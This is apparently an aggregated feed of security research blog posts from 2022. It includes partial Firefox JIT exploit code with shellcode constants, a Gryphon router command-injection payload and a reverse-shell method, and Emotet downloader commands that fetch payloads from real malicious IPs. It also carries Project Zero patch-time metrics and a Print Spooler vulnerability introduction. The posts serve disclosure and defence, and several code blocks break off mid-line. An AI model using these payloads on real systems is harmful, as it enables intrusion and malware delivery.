   console.log("[+] Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16));
 
   iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value
   counter = 0; // Used to prevent a while(true) situation
   while(counter 

The next step is to allocate an ArrayBuffer and find its location:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   // The target Uint32Array - A large size value to:
   //   - Help find the object (Not many 0x00101337 values nearby!)
   //   - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
   target_uint32arr = new Uint32Array(0x101337);
 
   // Find the Uint32Array starting from the original leaked Nursery pointer
   iterator = dbl_to_bigint(old_rareargdat_ptr);
   counter = 0; // Use a counter
   while(counter 

Now that the address of the ArrayBuffer has been found, a fake/clone of it can be constructed within its own backing store:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
  
   // Create a fake ArrayBuffer through cloning
   iterator = arr_buf_addr;
   for(i=0;i

There is now a valid fake ArrayBuffer object in an area of memory. In order to turn this block of data into a fake object, an object property or an object element needs to point to the location, which gives rise to the problem: We need to create a NaN-Boxed pointer. This can be achieved using our trusty “deleted property” bitmap. Earlier I mentioned the fact that we can’t change a pointer because bits can only be set, and that’s true.

The trick here is to use the corrupted array to write the address as a float, and then use the deleted property bitmap to create the NaN-Box, in essence faking the NaN-Boxed part of the pointer:

A breakdown of how the NaN-Boxed value is put together

Using JavaScript, this can be done as so:

/*
   write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box
*/
function write_nan(arg, addr) {
   evil[511] = addr;
   for(let i = 64 - 15; i 

Finally, the write primitive can then be used by changing the fake_arrbuf backing store using target_uint32arr[14] and target_uint32arr[15]:

/*
   write - Write a value to an address
*/
function write(address, value) {
   // Set the fake ArrayBuffer backing store address
   address = dbl_to_bigint(address)
   target_uint32arr[14] = parseInt(address) & 0xffffffff
   target_uint32arr[15] = parseInt(address >> 32n);

   // Use the fake ArrayBuffer backing store to write a value to a location
   value = dbl_to_bigint(value);
   fake_arrbuf[1] = parseInt(value >> 32n);
   fake_arrbuf[0] = parseInt(value & 0xffffffffn);
}

The following diagram shows how this all connects together:

Address-Of Primitive

The last primitive is the address-of (addrof) primitive. It takes an object and returns the address that it is located in. We can use our fake ArrayBuffer for this by setting a property in our arguments object to the target object, setting the backing store of our fake ArrayBuffer to this location, and reading the address. Note that in this function we’re using our fake object to read the value instead of the bitmap. This is just another way of doing the same thing.

/*
   addrof - Gets the address of a given object
*/
function addrof(arg, o) {
   // Set the 5th property of the arguments object
   arg[5] = o;

   // Get the address of the 5th property
   target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7)

   // Set the fake ArrayBuffer backing store to point to this location
   target_uint32arr[14] = parseInt(target) & 0xffffffff;
   target_uint32arr[15] = parseInt(target >> 32n);

   // Read the address of the object o
   return (BigInt(fake_arrbuf[1] & 0xffff) 

Code Execution

With the primitives completed, the only thing left is to get code execution. While there’s nothing particularly new about this method, I will go over it in the interest of completeness.

Unlike Chrome, WASM regions aren’t read-write-execute (RWX) in Firefox. The common way to go about getting code execution is by performing JIT spraying. Simply put, a function containing a number of constant values is made. By executing this function repeatedly, we can cause the browser to JIT compile it. These constants then sit beside each other in a read-execute (RX) region. By changing the function’s JIT region pointer to these constants, they can be executed as if they were instructions:

/*
   shellcode - Constant values which hold our shellcode to pop xcalc.
*/
function shellcode(){
   find_me = 5.40900888e-315; // 0x41414141 in memory
   A = -6.828527034422786e-229; // 0x9090909090909090
   B = 8.568532312320605e+170;
   C = 1.4813365150669252e+248;
   D = -6.032447120847604e-264;
   E = -6.0391189260385385e-264;
   F = 1.0842822352493598e-25;
   G = 9.241363425014362e+44;
   H = 2.2104256869204514e+40;
   I = 2.4929675059396527e+40;
   J = 3.2459699498717e-310;
   K = 1.637926e-318;
}
 
/*
   main - Performs the exploit
*/
function main() {
   for(i = 0;i 

A video of the exploit can be found here.

Wrote an exploit for a very interesting Firefox bug. Gave me a chance to try some new things out!

More coming soon! pic.twitter.com/g6K9tuK4UG

— maxpl0it (@maxpl0it) February 1, 2022

Conclusion

Throughout this post we have covered a wide range of topics, such as the basics of JIT compilers in JavaScript engines, vulnerabilities from their assumptions, exploit primitive construction, and even using CodeQL to find variants of vulnerabilities.

Doing so meant that a new set of exploit primitives were found, an unexploitable variant of the vulnerability itself was identified, and a vulnerability with many caveats was exploited.

This blog post highlights the kind of research SentinelLabs does in order to identify exploitation patterns.

Rooting Gryphon Routers via Shared VPN

4 February 2022 at 18:15

🎵 This LAN is your LAN, this LAN is my LAN 🎵

Intro

In August 2021, I discovered and reported a number of vulnerabilities in the Gryphon Tower router, including several command injection vulnerabilities exploitable to an attacker on the router’s LAN. Furthermore, these vulnerabilities are exploitable via the Gryphon HomeBound VPN, a network shared by all devices which have enabled the HomeBound service.

The implications of this are that an attacker can exploit and gain complete control over victim routers from anywhere on the internet if the victim is using the Gryphon HomeBound service. From there, the attacker could pivot to attacking other devices on the victim’s home network.

In the sections below, I’ll walk through how I discovered these vulnerabilities and some potential exploits.

Initial Access

When initially setting up the Gryphon router, the Gryphon mobile application is used to scan a QR code on the base of the device. In fact, all configuration of the device thereafter uses the mobile application. There is no traditional web interface to speak of. When navigating to the device’s IP in a browser, one is greeted with a simple interface that is used for the router’s Parental Control type features, running on the Lua Configuration Interface (LuCI).

The physical Gryphon device is nicely put together. Removing the case was simple, and upon removing it we can see that Gryphon has already included a handy pin header for the universal asynchronous receiver-transmitter (UART) interface.

As in previous router work I used JTAGulator and PuTTY to connect to the UART interface. The JTAGulator tool lets us identify the transmit/receive data (txd / rxd) pins as well as the appropriate baud rate (the symbol rate / communication speed) so we can communicate with the device.

​​

Unfortunately the UART interface doesn’t drop us directly into a shell during normal device operation. However, while watching the boot process, we see the option to enter a “failsafe” mode.

Fs in the chat

Entering this failsafe mode does drop us into a root shell on the device, though the rest of the device’s normal startup does not take place, so no services are running. This is still an excellent advantage, however, as it allows us to grab any interesting files from the filesystem, including the code for the limited web interface.

Getting a shell via LuCI

Now that we have the code for the web interface (specifically the index.lua file at /usr/lib/lua/luci/controller/admin/) we can take a look at which urls and functions are available to us. Given that this is lua code, we do a quick ctrl-f (the most advanced of hacking techniques) for calls to os.execute(), and while most calls to it in the code are benign, our eyes are immediately drawn to the config_repeater() function.

function config_repeater()
  <snip> --removed variable setting for clarity
  cmd = “/sbin/configure_repeater.sh “ .. “\”” .. ssid .. “\”” .. “ “ .. “\”” .. key .. “\”” .. “ “ .. “\”” .. hidden .. “\”” .. “ “ .. “\”” .. ssid5 .. “\”” .. “ “ .. “\”” .. key5 .. “\”” .. “ “ .. “\”” .. mssid .. “\”” .. “ “ .. “\”” .. mkey .. “\”” .. “ “ .. “\”” .. gssid .. “\”” .. “ “ .. “\”” .. gkey .. “\”” .. “ “ .. “\”” .. ghidden .. “\”” .. “ “ .. “\”” .. country .. “\”” .. “ “ .. “\”” .. bssid .. “\”” .. “ “ .. “\”” .. board .. “\”” .. “ “ .. “\”” .. wpa .. “\””
  os.execute(cmd)
os.execute(“touch /etc/rc_in_progress.txt”)
os.execute(“/sbin/mark_router.sh 2 &”)
luci.http.header(“Access-Control-Allow-Origin”,”*”)
luci.http.prepare_content(“application/json”)
luci.http.write(“{\”rc\”: \”OK\”}”)
end

The cmd variable in the snippet above is constructed using unsanitized user input in the form of POST parameters, and is passed directly to os.execute() in a way that would allow an attacker to easily inject commands.

This config_repeater() function corresponds to the url http://192.168.1.1/cgi-bin/luci/rc

Line 42: the answer to life, the universe, and command injections.

Since we know our input will be passed directly to os.execute(), we can build a simple payload to get a shell. In this case, stringing together commands using wget to grab a python reverse shell and run it.

Now that we have a shell, we can see what other services are active and listening on open ports. The most interesting of these is the controller_server service listening on port 9999.

controller_server and controller_client

controller_server is a service which listens on port 9999 of the Gryphon router. It accepts a number of commands in json format, the appropriate format for which we determined by looking at its sister binary, controller_client. The inputs expected for each controller_server operation can be seen being constructed in corresponding operations in controller_client.

Opening controller_server in Ghidra for analysis leads one fairly quickly to a large switch/case section where the potential cases correspond to numbers associated with specific operations to be run on the device.

In order to hit this switch/case statement, the input passed to the service is a json object in the format : {“<operationNumber>” : {“<op parameter 1>”:”param 1 value”, …}}.

Where the operation number corresponds to the decimal version of the desired function from the switch/case statements, and the operation parameters and their values are in most cases passed as input to that function.

Out of curiosity, I applied the elite hacker technique of ctrl-f-ing for direct calls to system() to see whether they were using unsanitized user input. As luck would have it, many of the functions (labelled operation_xyz in the screenshot above) pass user controlled strings directly in calls to system(), meaning we just found multiple command injection vulnerabilities.

As an example, let’s look at the case for operation 0x29 (41 in decimal):

In the screenshot above, we can see that the function parses a json object looking for the key cmd, and concatenates the value of cmd to the string “/sbin/uci set wireless.”, which is then passed directly to a call to system().

This can be trivially injected using any number of methods, the simplest being passing a string containing a semicolon. For example, a cmd value of “;id>/tmp/op41” would result in the output of the id command being output to the /tmp/op41 file.

The full payload to be sent to the controller_server service listening on 9999 to achieve this would be {“41”:{“cmd”:”;id>/tmp/op41”}}.

Additionally, the service leverages SSL/TLS, so in order to send this command using something like ncat, we would need to run the following series of commands:

echo ‘{“41”:{“cmd”:”;id>/tmp/op41"}}’ | ncat — ssl <device-ip> 9999

We can use this same method against a number of the other operations as well, and could create a payload which allows us to gain a shell on the device running as root.

Fortunately, the Gryphon routers do not expose port 9999 or 80 on the WAN interface, meaning an attacker has to be on the device’s LAN to exploit the vulnerabilities. That is, unless the attacker connects to the Gryphon HomeBound VPN.

HomeBound : Your LAN is my LAN too

Gryphon HomeBound is a mobile application which, according to Gryphon, securely routes all traffic on your mobile device through your Gryphon router before it hits the internet.

In order to accomplish this the Gryphon router connects to a VPN network which is shared amongst all devices connected to HomeBound, and connects using a static openvpn configuration file located on the router’s filesystem. An attacker can use this same openvpn configuration file to connect themselves to the HomeBound network, a class B network using addresses in the 10.8.0.0/16 range.

Furthermore, the Gryphon router exposes its listening services on the tun0 interface connected to the HomeBound network. An attacker connected to the HomeBound network could leverage one of the previously mentioned vulnerabilities to attack other routers on the network, and could then pivot to attacking other devices on the individual customers’ LANs.

This puts any customer who has enabled the HomeBound service at risk of attack, since their router will be exposing vulnerable services to the HomeBound network.

In the clip below we can see an attacking machine, connected to the HomeBound VPN, running a proof of concept reverse shell against a test router which has enabled the HomeBound service.

While the HomeBound service is certainly an interesting idea for a feature in a consumer router, it is implemented in a way that leaves users’ devices vulnerable to attack.

Wrap Up

An attacker being able to execute code as root on home routers could allow them to pivot to attacking those victims’ home networks. At a time when a large portion of the world is still working from home, this poses an increased risk to both the individual’s home network as well as any corporate assets they may have connected.

At the time of writing, Gryphon has not released a fix for these issues. The Gryphon Tower routers are still vulnerable to several command injection vulnerabilities exploitable via LAN or via the HomeBound network. Furthermore, during our testing it appeared that once the HomeBound service has been enabled, there is no way to disable the router’s connection to the HomeBound VPN without a factory reset.

It is recommended that customers who think they may be vulnerable contact Gryphon support for further information.

Update (April 8 2022): The issues have been fixed in updated firmware versions released by Gryphon. See the Solution section of Tenable’s advisory or contact Gryphon for more information: https://www.tenable.com/security/research/tra-2021-51


Rooting Gryphon Routers via Shared VPN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Emotet’s Uncommon Approach of Masking IP Addresses

4 February 2022 at 23:00

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format: 185.7.214.7

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.

Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee
Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee

Threat Summary

  1. The initial attack vector is a phishing email with a Microsoft Excel attachment. 
  2. Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
  3. The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
  4. The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.

Figure 3- Named Manager and Auto_Open triggers
Figure 3- Named Manager and Auto_Open triggers

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

FORMAT OBFUSCATED CMD DEOBFUSCATED CMD
Hexadecimal cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html http://185[.]7[.]214[.]7/fer/fer.html
Octal cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.

Figure 4: Process tree of excel execution
Figure 4: Process tree of excel execution

The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code

Figure 5- Image of HTML page viewed on browser
Figure 5- Image of HTML page viewed on a browser

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:\Users\Public\Documents\ssd.dll”.

cmd line (New-Object Net.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

cmd line cmd  /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString

IOC

TYPE VALUE SCANNER DETECTION NAME
XLS 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c McAfee LiveSafe and Total Protection X97M/Downloader.nn
DLL a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3 McAfee LiveSafe and Total Protection

 

Emotet-FSY
HTML URL http://185[.]7[.]214[.]7/fer/fer.html

http://46[.]105[.]81[.]76/c.html

WebAdvisor Blocked
DLL URL http://185[.]7[.]214[.]7/fer/fer.png

http://46[.]105[.]81[.]76/cc.png

WebAdvisor Blocked

MITRE ATT&CK

TECHNIQUE ID TACTIC TECHNIQUE DETAILS DESCRIPTION
T1566 Initial access Phishing attachment Initial maldoc uses phishing strings to convince users to open the maldoc
T1204 Execution User Execution Manual execution by user
T1071 Command and Control Standard Application Layer Protocol Attempts to connect through HTTP
T1059 Command and Scripting Interpreter Starts CMD.EXE for commands execution Excel uses cmd and PowerShell to execute command
T1218

 

Signed Binary Proxy Execution Uses RUNDLL32.EXE and MSHTA.EXE to load library rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

Next COM Programming Class

5 February 2022 at 10:42

Update: the class is cancelled. I guess there weren’t that many people interested in COM this time around.

Today I’m opening registration for the COM Programming class to be held in April. The syllabus for the 3 day class can be found here. The course will be delivered in 6 half-days (4 hours each).

Dates: April (25, 26, 27, 28), May (2, 3).
Times: 2pm to 6pm, London time
Cost: 700 USD (if paid by an individual), 1300 USD (if paid by a company).

The class will be conducted remotely using Microsoft Teams or a similar platform.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of this class. In case you have doubts, talk to me.

Participants in my Windows Internals and Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Previous students in my classes get 10% off. Multiple participants from the same company get a discount (email me for the details).

To register, send an email to [email protected] with the title “COM Training”, and write the name(s), email(s) and time zone(s) of the participants.

COMReuse

zodiacon

A walk through Project Zero metrics

By: Ryan
10 February 2022 at 16:58

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor

Total bugs

Fixed by day 90

Fixed during
grace period

Exceeded deadline

& grace period

Avg days to fix

Apple

84

73 (87%)

7 (8%)

4 (5%)

69

Microsoft

80

61 (76%)

15 (19%)

4 (5%)

83

Google

56

53 (95%)

2 (4%)

1 (2%)

44

Linux

25

24 (96%)

0 (0%)

1 (4%)

25

Adobe

19

15 (79%)

4 (21%)

0 (0%)

65

Mozilla

10

9 (90%)

1 (10%)

0 (0%)

46

Samsung

10

8 (80%)

2 (20%)

0 (0%)

72

Oracle

7

3 (43%)

0 (0%)

4 (57%)

109

Others*

55

48 (87%)

3 (5%)

4 (7%)

44

TOTAL

346

294 (84%)

34 (10%)

18 (5%)

61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only about 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

Average number of days to fix bugs across all vendors is 61 days. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor

Bugs in 2019

(avg days to fix)

Bugs in 2020

(avg days to fix)

Bugs in 2021

(avg days to fix)

Apple

61 (71)

13 (63)

11 (64)

Microsoft

46 (85)

18 (87)

16 (76)

Google

26 (49)

13 (22)

17 (53)

Linux

12 (32)

8 (22)

5 (15)

Others*

54 (63)

35 (54)

14 (29)

TOTAL

199 (67)

87 (54)

63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the others not represented on the chart have collectively cut their time to fix in more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period used 9 times (notably with half being by Microsoft), versus the slightly lower average of 12.5 in the other years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor

Total bugs

Avg fix time

iOS

76

70

Android (Samsung)

10

72

Android (Pixel)

6

72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser

Bugs

Avg days from bug report to public patch

Avg days from public patch to release

Avg days from bug report to release

Chrome

40

5.3

24.6

29.9

WebKit

27

11.6

61.1

72.7

Firefox

8

16.6

21.1

37.8

Total

75

8.8

37.3

46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to "Avg days from public patch to release" column:

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, with time from bug report to releasing a fix in the stable channel in 30 days. The time to patch is very fast here, with just an average of 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public is the bulk of the overall time window, though overall we still see the Chrome (blue) bars of the histogram toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest number of days to release a patch at 73 days. Their time to land the fix publicly is in the middle between Chrome and Firefox, but unfortunately this leaves a very long amount of time for opportunistic attackers to find the patch and exploit it prior to the fix being made available to users. This can be seen by the Apple (red) bars of the second histogram mostly being on the right side of the graph, and every one of them except one being past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de-facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

First!

8 February 2022 at 17:38

Today we are launching the IFCR research blog. The ambition is to provide original research and new technical ideas and approaches to the offensive security community.

New material will be added occasionally and not by a defined schedule. That being said, we’ve already got quite a few interesting posts lined-up.

Stay tuned for more…!

The IFCR Offensive Ops Team


First! was originally published in IFCR on Medium, where people are continuing the conversation by highlighting and responding to this story.

SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)

8 February 2022 at 20:21

UPDATE (Feb 9, 2022): Microsoft initially patched this vulnerability without giving me any information or acknowledgement, and as such, at the time of patch release, I thought that the vulnerability was identified as CVE-2022–22718, since it was the only Print Spooler vulnerability in the release without any acknowledgement. I contacted Microsoft for clarification, and the day after the patch release, Institut For Cyber Risk and I was acknowledged for CVE-2022–21999.

In this blog post, we’ll look at a Windows Print Spooler local privilege escalation vulnerability that I found and reported in November 2021. The vulnerability got patched as part of Microsoft’s Patch Tuesday in February 2022. We’ll take a quick tour of the components and inner workings of the Print Spooler, and then we’ll dive into the vulnerability with root cause, code snippets, images and much more. At the end of the blog post, you can also find a link to a functional exploit.

Background

Back in May 2020, Microsoft patched a Windows Print Spooler privilege escalation vulnerability. The vulnerability was assigned CVE-2020–1048, and Microsoft acknowledged Peleg Hadar and Tomer Bar of SafeBreach Labs for reporting the security issue. On the same day of the patch release, Yarden Shafir and Alex Ionescu published a technical write-up of the vulnerability. In essence, a user could write to an arbitrary file by creating a printer port that pointed to a file on disk. After the vulnerability (CVE-2020–1048) had been patched, the Print Spooler would now check if the user had permissions to create or write to the file before adding the port. A week after the release of the patch and blog post, Paolo Stagno (aka VoidSec) privately disclosed a bypass for CVE-2020–1048 to Microsoft. The bypass was patched three months later in August 2020, and Microsoft acknowledged eight independent entities for reporting the vulnerability, which was identified as CVE-2020–1337. The bypass for the vulnerability used a directory junction (symbolic link) to circumvent the security check. Suppose a user created the directory C:\MyFolder\ and configured a printer port to point to the file C:\MyFolder\Port. This operation would be granted, since the user is indeed allowed to create C:\MyFolder\Port. Now, what would happen if the user then turned C:\MyFolder\ into a directory junction that pointed to C:\Windows\System32\ after the port had been created? Well, the Spooler would simply write to the file C:\Windows\System32\Port.

These two vulnerabilities, CVE-2020–1048 and CVE-2020–1337, were patched in May and August 2020, respectively. In September 2020, Microsoft patched a different vulnerability in the Print Spooler. In short, this vulnerability allowed users to create arbitrary and writable directories by configuring the SpoolDirectory attribute on a printer. What was the patch? Almost the same story: After the patch, the Print Spooler would now check if the user had permissions to create the directory before setting the SpoolDirectory property on a printer. Perhaps you can already see where this post is going. Let’s start at the beginning.

Introduction to Spooler Components

The Windows Print Spooler is a built-in component on all Windows workstations and servers, and it is the primary component of the printing interface. The Print Spooler is an executable file that manages the printing process. Management of printing involves retrieving the location of the correct printer driver, loading that driver, spooling high-level function calls into a print job, scheduling the print job for printing, and so on. The Spooler is loaded at system startup and continues to run until the operating system is shut down. The primary components of the Print Spooler are illustrated in the following diagram.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-spooler-components

Application

